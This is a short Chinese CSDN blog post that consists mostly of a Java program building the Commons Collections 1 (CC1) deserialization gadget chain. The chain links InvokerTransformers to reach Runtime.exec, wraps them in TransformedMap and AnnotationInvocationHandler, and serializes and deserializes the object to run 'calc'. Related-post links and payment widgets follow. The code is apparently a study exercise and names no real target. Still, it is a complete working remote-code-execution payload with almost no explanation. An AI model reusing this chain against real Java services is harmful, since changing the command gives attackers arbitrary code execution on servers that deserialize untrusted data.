java反序列化CC1

已于 2023-09-17 21:04:41 修改
阅读量125 收藏
点赞数
分类专栏: 编程语言相关 文章标签: java c语言 android
于 2023-09-17 21:04:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44681307/article/details/132953627
版权 
package org.example;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;

public class Main {
    public static void main(String[] args) throws Exception{


//        Runtime r = Runtime.getRuntime();//单例模式,通过对应方法创建对象//问题一:r不能序列化,没有继承序列化接口
//        Class c = Runtime.class;
//        Method execMethod = c.getMethod("exec",String.class);
//        execMethod.invoke(r,"calc");


//        Class c = Runtime.class;
//        Method getRuntimeMethod = c.getMethod("getRuntime",null);
//        Runtime r = (Runtime) getRuntimeMethod.invoke(null,null);
//        Method execMethod = c.getMethod("exec", String.class);
//        execMethod.invoke(r,"calc");
//


//        Method getRuntimeMethod = (Method) new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}).transform(Runtime.class);
//        Runtime r = (Runtime) new InvokerTransformer("invoke",new Class[]{Object.class,Object.class},new Object[]{}).transform(getRuntimeMethod);
//        InvokerTransformer invokerTransformer = new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"});

        Transformer[] Transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(Transformers);


//        chainedTransformer.transform(Runtime.class);

//        InvokerTransformer invokerTransformer = new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"});

        HashMap<Object,Object> map = new HashMap<>();
        map.put("value","aaa");
        Map<Object,Object> transformedmap = TransformedMap.decorate(map,null,chainedTransformer);




        Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor annotationInvocationhdlConstructor = c.getDeclaredConstructor(Class.class,Map.class);
        annotationInvocationhdlConstructor.setAccessible(true);
        Object o = annotationInvocationhdlConstructor.newInstance(Target.class,transformedmap);


        serialize(o);
        unserialize("ser.bin");
    }


    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }


    public static Object unserialize(String Filename) throws IOException,ClassNotFoundException{
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }

}
dumplings。
关注
专栏目录
RMIDeserialize:RMI 反序列化环境 一步步
04-22
RMI反序列化学习环境,细节请参考博客、 java -cp RMIDeserialize.jar com.lala.ServerAndRegister :起一个包含CC链可以被攻击的RMI服务 java -jar RMI-Bypass290.jar <攻击目标IP> <攻击目标端口> <本地...
如何利用Jackson序列化忽略指定类型的属性详解
08-26
Jackson 序列化是 Java 世界中最流行的序列化框架之一,对于 Apache Avro 对象的序列化提供了详细的解决方案。在本文中,我们将介绍如何利用 Jackson 序列化忽略指定类型的属性,以避免序列化时的 exception。 首先...
protocol测试用例.zip
09-19
在测试用例中,`server.cc`和`client.cc`会通过protobuf进行通信,验证序列化和反序列化的正确性。这通常涉及到创建一个`Person`对象,填充其字段,序列化为字节流,然后在网络中发送。服务器接收到字节流后,反序列...
内存高效序列化库谷歌/ FlatBuffers
01-27
FlatBuffersFlatBuffers is a cross platform serialization library architected formaximum memory efficiency. It allows you to directly access serialized data without parsing/unpacking it first, while ...
GsonQuick:Gson的辅助工具类, 方便Gson的序列化
07-08
GsonQuickGson的辅助工具类, 方便Gson的序列化使用可以看Test里面的代码.示例Json如下: { "data": [{ "d": 771133, "a": 856813, "bigHash": "392b979d9568b2c9cc693ce577d7fadf" },{ "d": 123, "a": 43234, ...
基于vue框架的的汇生活家居商城的设计与实现bdjlq(程序+源码+数据库+调试部署+开发环境)系统界面在最后面。
h2345678的博客
10-29 1228
项目功能:商品分类,商品信息,用户。
(1)Java 编程基础概览:数据类型、常量、变量、标识符与运算符
码界领航的Cherry Yang的博客
10-28 1016
8 位,占1个字节,有符号的,范围 -128(-2^7)至 127(2^7-1)。32 位,占4个字节,范围 -2,147,483,648(-2^31)至 2,147,483,647(2^31 - 1)。Java 提供了六种数字类型,其中四个为整数类型,两个为浮点类型,还有字符类型,以及布尔型。16 位,占2个字节,范围 -32768(-2^15)至 32767(2^15 - 1)64 位,占8个字节,范围 -2^63 至 2^63 - 1。16 位 Unicode 字符,占 2 个字节。
java_方法递归调用
HHppGo的博客
10-27 496
简单的说: 递归就是方法自己调用自己,每次调用时传入不同的变量.递归有助于编程者解决复杂问题,同时可以让代码变得简洁。
ssm智慧社区电子商务系统+vue
weixin_44832324的博客
10-28 1228
系统能否进行正常工作,功能模块能否实现,程序代码是否有错误,这些都需要通过系统测试来进行判断,测试是程序开发中必不可少的步骤,就算系统一步不差的被开发出来了,但进行测试时总能发现一个之前从没遇到过的问题[26]。在系统开发的整个过程当中都需要不断进行系统测试,根据经验发现,前期的一个小问题,将会酿成后期的一个大问题,所以越早发现,越早解决,才能保证后续的编码、测试和设计能够顺利进行。目前,系统测试所使用的方法主要是黑盒测试,系统测试的目的包括:根据客户的需求来设计用户界面;
Java复习24(PTA)
2301_79272475的博客
10-30 293
Java复习24(PTA):多种排序的book类*
JavaScript的第十一天
全栈学习ing
10-31 549
在使用offset系列时需注意该属性为css属性,一般用于和javascript结合使用来获取信息,所以在使用该属性时只能获取值而不能改变值。最近的具有定位属性的祖先元素顶部边缘左侧边缘。
Java爬虫的京东“寻宝记”:揭秘商品类目信息
2401_87849308的博客
10-30 734
在这个数据驱动的时代,我们就像一群特工,穿梭在数字的海洋中,寻找着隐藏的宝藏——商品类目信息。今天,我们将带领你一起,用Java这把精密的瑞士军刀,深入京东的神秘领域,揭开商品类目的神秘面纱。为了避免被京东的反爬虫机制发现,我们需要设置合理的请求间隔,并且可能需要模拟浏览器的User-Agent。经过一系列的特工任务和挑战,我们终于成功获取了商品的类目信息,并且安全返回。我们需要找到京东商品类目信息的API接口,这将是我们特工任务的起点。在代码的世界里,我们不仅要追求技术的高度,更要追求道德的底线。
算法的学习笔记—左旋转字符串(牛客JZ58)
业精于勤,荒于嬉
10-27 710
在这道题目中,使用三步翻转法避免了直接拼接带来的额外开销,使得操作更加高效简洁。无论是面试还是实际开发中,这种方法都非常实用。这个题目很好地锻炼了对字符串操作和数组翻转的理解,三步翻转法的思路在其他字符串旋转、数组循环移位等问题中也能得到广泛应用。希望这篇文章能帮助大家掌握并熟练应用这种方法。😁热门专栏推荐想学习vue的可以看看这个java基础合集数据库合集redis合集nginx合集linux合集手写机制微服务组件spring_尘觉springMVCmybits🤔欢迎大家加入我的社区尘觉社区。
Spring学习笔记_16——@Inject
LuckyLay的博客
10-30 941
Inject注解是JSR330规范中提供的注解,在@Inject注解中不提供任何属性,可以配合@Qualifier注解使用。存在多个类型相同的Bean时,通过@Qualifier注解可以明确指定注入哪个Bean。兼容性@Inject是标准的一部分,因此更通用,可以在多种环境中使用。@Resource主要用于Java EE环境。@Autowired仅适用于Spring框架。查找策略@Inject默认按类型查找。@Resource默认按名称查找,没有找到时再按类型查找。@Autowired。
第九天: 深入探索C语言中的动态内存管理
最新发布
qq_57484399的博客
10-31 161
简单来说,就是C语言没有直接提供给我们的数据类型,但是C语言给我们留了一个后门,允许我们用一些特殊的关键字来定义自己的数据类型。枚举类型允许我们定义一组相关的常量,这些常量就是枚举类型的取值。听起来有点绕?我给你举个例子。比如说,我们要表示一周的七天,我们可以用字符串来表示,但处理起来比较麻烦。用整数表示就简单多了,星期一是1,星期二是2,以此类推。这样的变量就可以定义为枚举类型,它的取值范围就是1到7。首先,我们用struct关键字来定义一个结构体。
测试文章测试
繁依Fanyi的博客
10-31 110
【代码】测试文章测试。
大型商场应急响应系统开发:SpringBoot篇
2401_85439108的博客
10-29 728
6、网络上的客户端和服务器可以用来编程任何独立的编程环境,也有中国,GB2312,BIG5,日文写作,一般基金,用于支持多国语言,并且可以嵌入在数据表和其他软件shift_jis访问柱可以用作的名称。2、支持多种操作系统AIX的,FreeBSD下,HP-UX,Linux和Mac OS中,Novell公司的Netware,OpenBSD系统,OS/2裹时,Solaris,Windows等。编程语言,如C, C ++,Python和Java的,的Perl,PHP,埃菲尔铁塔,Ruby和Tcl的。
数组排序简介-归并排序(Merge Sort)
Runing_WoNiu的博客
10-31 128
采用经典的分治策略,先递归地将当前数组平均分成两半,然后将有序数组两两合并,最终合并成一个有序数组。
ssm026校园美食交流系统+vue(论文+源码)_kaic
涉及毕业论文、远程调试、小程序、管理系统、JAVA、C#、IDEA、VS开发工具等
10-31 830
1.1 研究背景。
Java反序列化回显解决方案与安全分析
"Java反序列化回显解决方案" Java反序列化回显问题是一个重要的安全议题,尤其是在网络安全领域。反序列化是指将已序列化的对象数据恢复为原来的对象状态,而这个过程如果处理不当,可能会被恶意利用。在Java中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值